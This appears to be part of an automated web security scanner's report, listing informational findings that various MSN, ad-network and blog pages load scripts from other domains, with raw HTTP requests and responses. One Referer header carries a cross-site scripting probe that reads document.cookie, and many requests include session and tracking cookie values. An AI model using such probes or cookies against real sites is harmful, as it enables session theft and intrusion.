WT_FPC=id=173.193.214.243-2629510496.30125799:lv=1294837831501:ss=1294837831501; omniID=1294458843112_6a73_9555_4be9_86ce555049db; msdn=L=1033; A=I&I=AxUFAAAAAAAWBwAAtB6/BX1JsfAlwGK0F9Loug!!&M=1; ixpLightBrowser=0

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=604800
ntCoent-Length: 607
Content-Type: text/html
Last-Modified: Mon, 08 Jun 2009 11:01:13 GMT
Accept-Ranges: bytes
ETag: "eff9f76f28e8c91:a15"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo", policyref="http://privacy.redacted/w3c/p3p.xml"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 14:50:53 GMT
Content-Length: 607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Sync</title>
...[SNIP]...
</span>
<script type="text/javascript" src="//analytics.atdmt.com/Scripts/wlHelper.js?i=MUID"></script>
<script type="text/javascript" src="//analytics.live.com/Scripts/wlHelper.js?i=ANID"></script>
...[SNIP]...

23.15. http://analytics.redacted/Include.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://analytics.redacted
Path:	/Include.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://analytics.atdmt.com/Scripts/wlHelper.js?i=MUID
http://analytics.live.com/Scripts/wlHelper.js?i=ANID

Request

GET /Include.html HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://analytics.live.com/Sync.html?V=3525&AQNT=1
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: analytics.redacted
If-Modified-Since: Mon, 08 Jun 2009 11:01:13 GMT
If-None-Match: "eff9f76f28e8c91:5d1"
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=604800
ntCoent-Length: 464
Content-Type: text/html
Last-Modified: Mon, 08 Jun 2009 11:01:13 GMT
Accept-Ranges: bytes
ETag: "eff9f76f28e8c91:823"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo", policyref="http://privacy.redacted/w3c/p3p.xml"
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:26:39 GMT
Content-Length: 464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Sync</title>
...[SNIP]...
</span>
<script type="text/javascript" src="//analytics.atdmt.com/Scripts/wlHelper.js?i=MUID"></script>
<script type="text/javascript" src="//analytics.live.com/Scripts/wlHelper.js?i=ANID"></script>
...[SNIP]...

23.16. http://analytics.redacted/sync.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://analytics.redacted
Path:	/sync.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://analytics.atdmt.com/Scripts/wlHelper.js?i=MUID
http://analytics.live.com/Scripts/wlHelper.js?i=ANID

Request

GET /sync.html HTTP/1.1
Host: analytics.redacted
Proxy-Connection: keep-alive
Referer: http://investing.money.redacted/investments/charts?Symbol=indu22b72%22%3balert(document.cookie)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=604800
ntCoent-Length: 607
Content-Type: text/html
Last-Modified: Mon, 08 Jun 2009 11:01:13 GMT
Accept-Ranges: bytes
ETag: "eff9f76f28e8c91:9ed"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo", policyref="http://privacy.redacted/w3c/p3p.xml"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 13:00:12 GMT
Content-Length: 607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Sync</title>
...[SNIP]...
</span>
<script type="text/javascript" src="//analytics.atdmt.com/Scripts/wlHelper.js?i=MUID"></script>
<script type="text/javascript" src="//analytics.live.com/Scripts/wlHelper.js?i=ANID"></script>
...[SNIP]...

23.17. http://assets.tumblr.com/iframe.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://assets.tumblr.com
Path:	/iframe.html

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/ga.js

Request

Response

23.18. http://astrocenter.astrology.redacted/msn/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://astrocenter.astrology.redacted
Path:	/msn/Default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://astrocenter.msn.us.intellitxt.com/ast/js/msn/astrocenter.msn_cs.js
http://www.astrocenter.com/us/js/center-horoscope.js

Request

GET /msn/Default.aspx HTTP/1.1
Host: astrocenter.astrology.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 92589
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:45:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Fre
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.astrocenter.com/us/js/center-horoscope.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://astrocenter.msn.us.intellitxt.com/ast/js/msn/astrocenter.msn_cs.js"></script>
...[SNIP]...

23.19. http://athima-chansanchai.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://athima-chansanchai.newsvine.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

GET / HTTP/1.1
Host: athima-chansanchai.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:50:18 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=537268251bbeeeeb3942d69bd368a709; expires=Sat, 25-Jan-2031 17:50:18 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 73300

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...

23.20. http://autos.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://autos.redacted
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://blu.stj.s-redacted/br/gbl/js/2/report.js
http://blu.stj.s-redacted/br/gbl/js/4/mozcompat.js
http://blu.stj.s-redacted/br/gbl/js/7/core.js
http://blu.stj.s-redacted/br/gbl/js/7/jquery-1.3.2.min.js
http://blu.stj.s-redacted/br/gbl/js/7/navigation.js
http://blu.stj.s-redacted/br/mktplaces/js/core.2010.02.22.js
http://blu.stj.s-redacted/br/om/js/lt/lt.js
http://blu.stj.s-redacted/br/om/js/s_code.js

Request

GET / HTTP/1.1
Host: autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:45:38 GMT
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Server: BL2CARWB06
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2003.09.02T11:37-0700" exp "2004.09.02T12:00-0700" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 44236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
<met
...[SNIP]...
<script type="text/javascript" src="http://blu.stj.s-msn.com/br/gbl/js/4/mozcompat.js"></script><script type="text/javascript" src="http://blu.stj.s-msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script><script type="text/javascript" src="http://blu.stj.s-msn.com/br/gbl/js/7/core.js"></script><script type="text/javascript" src="http://blu.stj.s-msn.com/br/gbl/js/2/report.js"></script><script type="text/javascript" src="http://blu.stj.s-msn.com/br/mktplaces/js/core.2010.02.22.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://blu.stj.s-msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://blu.stj.s-msn.com/br/om/js/s_code.js"></script>
...[SNIP]...
</div><script type='text/javascript' src='http://blu.stj.s-msn.com/br/om/js/lt/lt.js'></script>
...[SNIP]...

23.21. http://autos.redacted/research/compare/compare.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://autos.redacted
Path:	/research/compare/compare.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://blu.stj.s-redacted/br/gbl/js/2/report.js
http://blu.stj.s-redacted/br/gbl/js/4/mozcompat.js
http://blu.stj.s-redacted/br/gbl/js/7/core.js
http://blu.stj.s-redacted/br/gbl/js/7/jquery-1.3.2.min.js
http://blu.stj.s-redacted/br/gbl/js/7/navigation.js
http://blu.stj.s-redacted/br/mktplaces/js/core.2010.02.22.js
http://blu.stj.s-redacted/br/om/js/lt/lt.js
http://blu.stj.s-redacted/br/om/js/s_code.js

Request

GET /research/compare/compare.aspx HTTP/1.1
Host: autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:45:38 GMT
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Server: BL2CARWB03
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2003.09.02T11:37-0700" exp "2004.09.02T12:00-0700" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 48546

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
<script type="text/javascript" src="http://blu.stj.s-msn.com/br/gbl/js/4/mozcompat.js"></script><script type="text/javascript" src="http://blu.stj.s-msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script><script type="text/javascript" src="http://blu.stj.s-msn.com/br/gbl/js/7/core.js"></script><script type="text/javascript" src="http://blu.stj.s-msn.com/br/gbl/js/2/report.js"></script><script type="text/javascript" src="http://blu.stj.s-msn.com/br/mktplaces/js/core.2010.02.22.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://blu.stj.s-msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://blu.stj.s-msn.com/br/om/js/s_code.js"></script>
...[SNIP]...
</div><script type='text/javascript' src='http://blu.stj.s-msn.com/br/om/js/lt/lt.js'></script>
...[SNIP]...

23.22. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1037239110/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1037239110?

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=914803576615380; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; session=1296350849|1296350849; dlx_XXX=set; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; other_20110126=set; OAX=rcHW800iZiMAAocf; NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:50:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2670
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/103723
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1037239110/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1037239110?">\n');
document.write ('</SCRIPT>
...[SNIP]...

23.23. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1528833724/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1528833724?

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90?http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; ATTWL=CollectiveB3; session=1296350849|1296350849

Response

23.24. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/804341397/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=804341397?

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:05:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2661
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/804341
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/804341397/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=804341397?">\n');
document.write ('</SCRIPT>
...[SNIP]...

23.25. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/72207368/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=72207368?

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90?http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; ATTWL=CollectiveB3; session=1296350849|1296350849

Response

23.26. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90

Issue detail

The response dynamically includes the following script from another domain:

http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269?

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90?http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; ATTWL=CollectiveB3; session=1296350849|1296350849

Response

23.27. http://bassistance.de/jquery-plugins/jquery-plugin-validation/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bassistance.de
Path:	/jquery-plugins/jquery-plugin-validation/

Issue detail

The response dynamically includes the following script from another domain:

http://twitter.com/statuses/user_timeline/bassistance.json?callback=twitterCallback&count=3&named_obj

Request

GET /jquery-plugins/jquery-plugin-validation/ HTTP/1.1
Host: bassistance.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:06:02 GMT
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
Vary: Cookie,Accept-Encoding
X-Pingback: http://bassistance.de/xmlrpc.php
WP-Super-Cache: Served legacy cache file
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 672388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
</h2>

<script type="text/javascript" src="http://twitter.com/statuses/user_timeline/bassistance.json?callback=twitterCallback&count=3&named_obj"></script>
...[SNIP]...

23.28. http://blogs.discovermagazine.com/badastronomy/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.discovermagazine.com
Path:	/badastronomy/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide
http://digg.com/tools/diggthis.js
http://edge.quantserve.com/quant.js
http://twittercounter.com/embed/BadAstronomer/f0a804/000000
http://w.sharethis.com/button/sharethis.js
http://www.fark.com/js/farkit.js
http://www.google-analytics.com/urchin.js

Request

GET /badastronomy/ HTTP/1.1
Host: blogs.discovermagazine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:06:04 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Sun, 30 Jan 2011 01:39:04 GMT
Vary: Cookie,Accept-Encoding,User-Agent
X-Pingback: http://blogs.discovermagazine.com/badastronomy/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 104549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<link rel="stylesheet" type="text/css" media="screen" href="http://blogs.discovermagazine.com/badastronomy/wp-content/themes/discover/css/Quills.css" />
<script type="text/javascript" src="http://www.fark.com/js/farkit.js"></script>
...[SNIP]...
<meta name="generator" content="WordPress 3.0.3" />
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&type=wordpress&buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
